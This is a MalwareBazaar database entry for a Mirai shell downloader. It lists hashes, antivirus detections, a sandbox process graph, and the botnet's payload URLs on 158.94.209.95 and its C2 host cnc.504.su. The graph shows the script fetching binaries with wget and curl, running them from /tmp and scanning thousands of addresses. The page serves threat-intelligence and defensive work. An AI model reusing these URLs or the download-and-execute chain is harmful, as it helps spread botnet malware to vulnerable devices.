MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81
SHA3-384 hash: bf9a27608ac9dc2eade91f5f8a94ebb7707e9d07a0072e96cbfdadbba668052665f21d3230dc75e0a9fc7aa733362443
SHA1 hash: cb683ede5f691de75a3b2d725b3414d9620c5833
MD5 hash: 642010d857743ae8e24d76d5d84c8c1c
humanhash: aspen-timing-alaska-magazine
File name:76d32be0.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:4'676 bytes
First seen:2025-10-12 11:32:27 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:vDoLpDL3kLTwLL2EpLLbiLJPLr5LzULbaL1JL7NLbSLJi:224a
TLSH T1D4A136F9747497BE6DB1ED7321DAC502B24170AAE4DA4C0AE2E1F0E4084EF61F4D4AC2
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86924b4daa3d183fc7d1312a17b68aa952c8d0136918478730cd95623bb1890ed9 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips4e06ece7ae576417a8dc0e419b8782ce0860cd9e90bc947b4c118e2a52786304 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl6294a0eb4ee65e6ba006a024522658107ec8753f6d3df2dc7309776199da65e7 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm236fa5092bd06813996532ef793834e31a69ed1e576599eaa97bcf8fb7db9b61 Miraielf mirai
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5dc06d5d4daab1b23eef11b6eac8da75bafa7e75a7e44d60fb14c9db8199c7553 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm641e5adc3527479d2bee1a3bb4c590899d40713df8fd20e0871a8f2e46a7afedd Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm76d65317a9d29fdfee8ff125c78705186155fdb0162f3d13890c43b971bdf6586 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppccd58c26a61496c5f2091a6e51f6d2764a61073bf619bdd2322be5379b519c71d Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68kfa94633bd1d61a6bfaad5d6308f4020013ccc11c9c9fa463e9795485b84ddaf5 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc9c08e0232337e3288d21e5f278f98d2a7d514763b85aa5d79c3588e81037ec5d Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i6864bd20d49002299fd230f3eeddddcf6bf9e81033d15c8519cdfc296723a57b9d3 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh48ac733a14bdcdf3b2543a8e420d2fa224bc067e425ac38ea9d99fbe389f48c44 Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc248b6599aebc4e053a68ae502bafc1fec19cc1edcc455a8358e2d3dbe46f0e5e Miraielf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64e1872b44f151615dd30c9120e8d8bd8d477212b7188a79478af49ff7df6610a9 Miraielf mirai

Intelligence

File Origin
# of uploads :
1
# of downloads :
40
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-09-20T11:25:00Z UTC
Last seen:
2025-10-12T10:34:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.p HEUR:Trojan-Downloader.Shell.Agent.gen HEUR:Trojan-Downloader.Shell.Agent.a
Link:
https://opentip.kaspersky.com/29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/f13e414c-7796-4dc2-8d43-7b22b46ba4e6
Behavior Graph:
Download SVG
%3 guuid=a798193c-1600-0000-f013-c5bfba0e0000 pid=3770 /usr/bin/sudo guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779 /tmp/sample.bin guuid=a798193c-1600-0000-f013-c5bfba0e0000 pid=3770->guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779 execve guuid=3dc8ad3e-1600-0000-f013-c5bfc60e0000 pid=3782 /usr/bin/wget net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=3dc8ad3e-1600-0000-f013-c5bfc60e0000 pid=3782 execve guuid=d43e184b-1600-0000-f013-c5bff70e0000 pid=3831 /usr/bin/curl net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d43e184b-1600-0000-f013-c5bff70e0000 pid=3831 execve guuid=1202fc5a-1600-0000-f013-c5bf3a0f0000 pid=3898 /usr/bin/cat guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=1202fc5a-1600-0000-f013-c5bf3a0f0000 pid=3898 execve guuid=b9b13f5b-1600-0000-f013-c5bf3c0f0000 pid=3900 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=b9b13f5b-1600-0000-f013-c5bf3c0f0000 pid=3900 execve guuid=9f9c795b-1600-0000-f013-c5bf3e0f0000 pid=3902 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=9f9c795b-1600-0000-f013-c5bf3e0f0000 pid=3902 execve guuid=8057c05b-1600-0000-f013-c5bf420f0000 pid=3906 /usr/bin/wget net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=8057c05b-1600-0000-f013-c5bf420f0000 pid=3906 execve guuid=e0770369-1600-0000-f013-c5bf680f0000 pid=3944 /usr/bin/curl net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=e0770369-1600-0000-f013-c5bf680f0000 pid=3944 execve guuid=f0cc6975-1600-0000-f013-c5bfa10f0000 pid=4001 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=f0cc6975-1600-0000-f013-c5bfa10f0000 pid=4001 clone guuid=199b8975-1600-0000-f013-c5bfa20f0000 pid=4002 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=199b8975-1600-0000-f013-c5bfa20f0000 pid=4002 execve guuid=5fd3d175-1600-0000-f013-c5bfa40f0000 pid=4004 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=5fd3d175-1600-0000-f013-c5bfa40f0000 pid=4004 execve guuid=111230a5-1700-0000-f013-c5bf68140000 pid=5224 /usr/bin/wget net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=111230a5-1700-0000-f013-c5bf68140000 pid=5224 execve guuid=b31b09b0-1700-0000-f013-c5bf72140000 pid=5234 /usr/bin/curl net send-data write-file guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=b31b09b0-1700-0000-f013-c5bf72140000 pid=5234 execve guuid=d39d51bb-1700-0000-f013-c5bf73140000 pid=5235 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d39d51bb-1700-0000-f013-c5bf73140000 pid=5235 clone guuid=497171bb-1700-0000-f013-c5bf74140000 pid=5236 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=497171bb-1700-0000-f013-c5bf74140000 pid=5236 execve guuid=d988c6bb-1700-0000-f013-c5bf75140000 pid=5237 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d988c6bb-1700-0000-f013-c5bf75140000 pid=5237 execve guuid=503899ee-1800-0000-f013-c5bf7e140000 pid=5246 /usr/bin/wget net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=503899ee-1800-0000-f013-c5bf7e140000 pid=5246 execve guuid=16ba73f5-1800-0000-f013-c5bf82140000 pid=5250 /usr/bin/curl net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=16ba73f5-1800-0000-f013-c5bf82140000 pid=5250 execve guuid=d9e279fd-1800-0000-f013-c5bf83140000 pid=5251 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d9e279fd-1800-0000-f013-c5bf83140000 pid=5251 clone guuid=24029ffd-1800-0000-f013-c5bf84140000 pid=5252 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=24029ffd-1800-0000-f013-c5bf84140000 pid=5252 execve guuid=a71f7cfe-1800-0000-f013-c5bf85140000 pid=5253 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=a71f7cfe-1800-0000-f013-c5bf85140000 pid=5253 execve guuid=b3f49632-1a00-0000-f013-c5bfa7140000 pid=5287 /usr/bin/wget net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=b3f49632-1a00-0000-f013-c5bfa7140000 pid=5287 execve guuid=c8fbf933-1a00-0000-f013-c5bfab140000 pid=5291 /usr/bin/curl net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=c8fbf933-1a00-0000-f013-c5bfab140000 pid=5291 execve guuid=a3d91b36-1a00-0000-f013-c5bfac140000 pid=5292 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=a3d91b36-1a00-0000-f013-c5bfac140000 pid=5292 clone guuid=293b3236-1a00-0000-f013-c5bfad140000 pid=5293 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=293b3236-1a00-0000-f013-c5bfad140000 pid=5293 execve guuid=704e8136-1a00-0000-f013-c5bfae140000 pid=5294 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=704e8136-1a00-0000-f013-c5bfae140000 pid=5294 execve guuid=69adb273-1e00-0000-f013-c5bfb1140000 pid=5297 /usr/bin/wget net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=69adb273-1e00-0000-f013-c5bfb1140000 pid=5297 execve guuid=5f878f74-1e00-0000-f013-c5bfb4140000 pid=5300 /usr/bin/curl net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=5f878f74-1e00-0000-f013-c5bfb4140000 pid=5300 execve guuid=49644976-1e00-0000-f013-c5bfb5140000 pid=5301 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=49644976-1e00-0000-f013-c5bfb5140000 pid=5301 clone guuid=84a86176-1e00-0000-f013-c5bfb6140000 pid=5302 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=84a86176-1e00-0000-f013-c5bfb6140000 pid=5302 execve guuid=d583b276-1e00-0000-f013-c5bfb7140000 pid=5303 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d583b276-1e00-0000-f013-c5bfb7140000 pid=5303 execve guuid=50bebeb3-2200-0000-f013-c5bfb9140000 pid=5305 /usr/bin/wget net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=50bebeb3-2200-0000-f013-c5bfb9140000 pid=5305 execve guuid=e71d9ab4-2200-0000-f013-c5bfbd140000 pid=5309 /usr/bin/curl net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=e71d9ab4-2200-0000-f013-c5bfbd140000 pid=5309 execve guuid=dc5732b6-2200-0000-f013-c5bfbe140000 pid=5310 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=dc5732b6-2200-0000-f013-c5bfbe140000 pid=5310 clone guuid=b68d47b6-2200-0000-f013-c5bfbf140000 pid=5311 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=b68d47b6-2200-0000-f013-c5bfbf140000 pid=5311 execve guuid=d5c5a3b6-2200-0000-f013-c5bfc0140000 pid=5312 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=d5c5a3b6-2200-0000-f013-c5bfc0140000 pid=5312 execve guuid=551080f7-2600-0000-f013-c5bfc2140000 pid=5314 /usr/bin/wget net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=551080f7-2600-0000-f013-c5bfc2140000 pid=5314 execve guuid=8c0073f8-2600-0000-f013-c5bfc6140000 pid=5318 /usr/bin/curl net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=8c0073f8-2600-0000-f013-c5bfc6140000 pid=5318 execve guuid=dd8c49fa-2600-0000-f013-c5bfc7140000 pid=5319 /usr/bin/bash guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=dd8c49fa-2600-0000-f013-c5bfc7140000 pid=5319 clone guuid=4d3d61fa-2600-0000-f013-c5bfc8140000 pid=5320 /usr/bin/chmod guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=4d3d61fa-2600-0000-f013-c5bfc8140000 pid=5320 execve guuid=3572a5fa-2600-0000-f013-c5bfc9140000 pid=5321 /tmp/76d32be0 net guuid=60c6eb3d-1600-0000-f013-c5bfc30e0000 pid=3779->guuid=3572a5fa-2600-0000-f013-c5bfc9140000 pid=5321 execve ca4cc0d7-5486-5710-a0a1-75a555a3b3a4 158.94.209.95:80 guuid=3dc8ad3e-1600-0000-f013-c5bfc60e0000 pid=3782->ca4cc0d7-5486-5710-a0a1-75a555a3b3a4 send: 197B guuid=d43e184b-1600-0000-f013-c5bff70e0000 pid=3831->ca4cc0d7-5486-5710-a0a1-75a555a3b3a4 send: 146B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=9f9c795b-1600-0000-f013-c5bf3e0f0000 pid=3902->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904 /tmp/76d32be0 dns net send-data zombie guuid=9f9c795b-1600-0000-f013-c5bf3e0f0000 pid=3902->guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904 clone guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B 2ac2249c-25bc-5019-a88f-33a6c2731b07 cnc.504.su:56999 guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904->2ac2249c-25bc-5019-a88f-33a6c2731b07 con guuid=ba32cb5b-1600-0000-f013-c5bf430f0000 pid=3907 /tmp/76d32be0 guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904->guuid=ba32cb5b-1600-0000-f013-c5bf430f0000 pid=3907 clone guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908 /tmp/76d32be0 net net-scan send-data guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904->guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908 clone guuid=e356d85b-1600-0000-f013-c5bf450f0000 pid=3909 /tmp/76d32be0 guuid=84b2b35b-1600-0000-f013-c5bf400f0000 pid=3904->guuid=e356d85b-1600-0000-f013-c5bf450f0000 pid=3909 clone guuid=8057c05b-1600-0000-f013-c5bf420f0000 pid=3906->ca4cc0d7-5486-5710-a0a1-75a555a3b3a4 send: 198B 4bcd05e0-7ebf-53bb-9cc8-c008d3256770 cnc.504.su:80 guuid=8057c05b-1600-0000-f013-c5bf420f0000 pid=3906->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 198B guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908|send-data send-data to 768 IP addresses review logs to see them all guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908->guuid=e62dce5b-1600-0000-f013-c5bf440f0000 pid=3908|send-data send guuid=e0770369-1600-0000-f013-c5bf680f0000 pid=3944->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 147B guuid=5fd3d175-1600-0000-f013-c5bfa40f0000 pid=4004->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 5fbefa0b-74db-5ddb-909f-7c8f89ca1384 0.0.0.0:46157 guuid=5fd3d175-1600-0000-f013-c5bfa40f0000 pid=4004->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221 /tmp/76d32be0 dns net send-data zombie guuid=5fd3d175-1600-0000-f013-c5bfa40f0000 pid=4004->guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221 clone guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221->2ac2249c-25bc-5019-a88f-33a6c2731b07 con guuid=981c2ba5-1700-0000-f013-c5bf66140000 pid=5222 /tmp/76d32be0 guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221->guuid=981c2ba5-1700-0000-f013-c5bf66140000 pid=5222 clone guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223 /tmp/76d32be0 net net-scan send-data guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221->guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223 clone guuid=598b33a5-1700-0000-f013-c5bf69140000 pid=5225 /tmp/76d32be0 guuid=80121ea5-1700-0000-f013-c5bf65140000 pid=5221->guuid=598b33a5-1700-0000-f013-c5bf69140000 pid=5225 clone guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223|send-data send-data to 1536 IP addresses review logs to see them all guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223->guuid=82a52fa5-1700-0000-f013-c5bf67140000 pid=5223|send-data send guuid=111230a5-1700-0000-f013-c5bf68140000 pid=5224->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 198B guuid=b31b09b0-1700-0000-f013-c5bf72140000 pid=5234->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 147B guuid=d988c6bb-1700-0000-f013-c5bf75140000 pid=5237->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d988c6bb-1700-0000-f013-c5bf75140000 pid=5237->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245 /tmp/76d32be0 dns net send-data zombie guuid=d988c6bb-1700-0000-f013-c5bf75140000 pid=5237->guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245 clone guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245->2ac2249c-25bc-5019-a88f-33a6c2731b07 con guuid=ac1dc2ee-1800-0000-f013-c5bf7f140000 pid=5247 /tmp/76d32be0 guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245->guuid=ac1dc2ee-1800-0000-f013-c5bf7f140000 pid=5247 clone guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248 /tmp/76d32be0 net net-scan send-data guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245->guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248 clone guuid=4eeee2ee-1800-0000-f013-c5bf81140000 pid=5249 /tmp/76d32be0 guuid=f2f081ee-1800-0000-f013-c5bf7d140000 pid=5245->guuid=4eeee2ee-1800-0000-f013-c5bf81140000 pid=5249 clone guuid=503899ee-1800-0000-f013-c5bf7e140000 pid=5246->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248|send-data send-data to 1920 IP addresses review logs to see them all guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248->guuid=786bd4ee-1800-0000-f013-c5bf80140000 pid=5248|send-data send guuid=16ba73f5-1800-0000-f013-c5bf82140000 pid=5250->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=a71f7cfe-1800-0000-f013-c5bf85140000 pid=5253->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a71f7cfe-1800-0000-f013-c5bf85140000 pid=5253->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286 /tmp/76d32be0 net send-data zombie guuid=a71f7cfe-1800-0000-f013-c5bf85140000 pid=5253->guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286 clone guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=48d99732-1a00-0000-f013-c5bfa8140000 pid=5288 /tmp/76d32be0 guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286->guuid=48d99732-1a00-0000-f013-c5bfa8140000 pid=5288 clone guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289 /tmp/76d32be0 net net-scan send-data zombie guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286->guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289 clone guuid=bca1a332-1a00-0000-f013-c5bfaa140000 pid=5290 /tmp/76d32be0 guuid=dc478732-1a00-0000-f013-c5bfa6140000 pid=5286->guuid=bca1a332-1a00-0000-f013-c5bfaa140000 pid=5290 clone guuid=b3f49632-1a00-0000-f013-c5bfa7140000 pid=5287->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289|send-data send-data to 4097 IP addresses review logs to see them all guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289->guuid=37309c32-1a00-0000-f013-c5bfa9140000 pid=5289|send-data send guuid=c8fbf933-1a00-0000-f013-c5bfab140000 pid=5291->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=704e8136-1a00-0000-f013-c5bfae140000 pid=5294->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=704e8136-1a00-0000-f013-c5bfae140000 pid=5294->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295 /tmp/76d32be0 net send-data zombie guuid=704e8136-1a00-0000-f013-c5bfae140000 pid=5294->guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295 clone guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=65b0af73-1e00-0000-f013-c5bfb0140000 pid=5296 /tmp/76d32be0 guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295->guuid=65b0af73-1e00-0000-f013-c5bfb0140000 pid=5296 clone guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298 /tmp/76d32be0 net net-scan send-data zombie guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295->guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298 clone guuid=198eb873-1e00-0000-f013-c5bfb3140000 pid=5299 /tmp/76d32be0 guuid=eedfa173-1e00-0000-f013-c5bfaf140000 pid=5295->guuid=198eb873-1e00-0000-f013-c5bfb3140000 pid=5299 clone guuid=69adb273-1e00-0000-f013-c5bfb1140000 pid=5297->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298|send-data send-data to 4097 IP addresses review logs to see them all guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298->guuid=3a70b473-1e00-0000-f013-c5bfb2140000 pid=5298|send-data send guuid=5f878f74-1e00-0000-f013-c5bfb4140000 pid=5300->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=d583b276-1e00-0000-f013-c5bfb7140000 pid=5303->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d583b276-1e00-0000-f013-c5bfb7140000 pid=5303->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304 /tmp/76d32be0 net send-data zombie guuid=d583b276-1e00-0000-f013-c5bfb7140000 pid=5303->guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304 clone guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=41b4bfb3-2200-0000-f013-c5bfba140000 pid=5306 /tmp/76d32be0 guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304->guuid=41b4bfb3-2200-0000-f013-c5bfba140000 pid=5306 clone guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307 /tmp/76d32be0 net net-scan send-data zombie guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304->guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307 clone guuid=4b19c8b3-2200-0000-f013-c5bfbc140000 pid=5308 /tmp/76d32be0 guuid=1802acb3-2200-0000-f013-c5bfb8140000 pid=5304->guuid=4b19c8b3-2200-0000-f013-c5bfbc140000 pid=5308 clone guuid=50bebeb3-2200-0000-f013-c5bfb9140000 pid=5305->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307|send-data send-data to 4097 IP addresses review logs to see them all guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307->guuid=f54dc3b3-2200-0000-f013-c5bfbb140000 pid=5307|send-data send guuid=e71d9ab4-2200-0000-f013-c5bfbd140000 pid=5309->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=d5c5a3b6-2200-0000-f013-c5bfc0140000 pid=5312->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d5c5a3b6-2200-0000-f013-c5bfc0140000 pid=5312->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313 /tmp/76d32be0 net send-data zombie guuid=d5c5a3b6-2200-0000-f013-c5bfc0140000 pid=5312->guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313 clone guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=4f8783f7-2600-0000-f013-c5bfc3140000 pid=5315 /tmp/76d32be0 guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313->guuid=4f8783f7-2600-0000-f013-c5bfc3140000 pid=5315 clone guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316 /tmp/76d32be0 net net-scan send-data zombie guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313->guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316 clone guuid=0d528df7-2600-0000-f013-c5bfc5140000 pid=5317 /tmp/76d32be0 guuid=b9136df7-2600-0000-f013-c5bfc1140000 pid=5313->guuid=0d528df7-2600-0000-f013-c5bfc5140000 pid=5317 clone guuid=551080f7-2600-0000-f013-c5bfc2140000 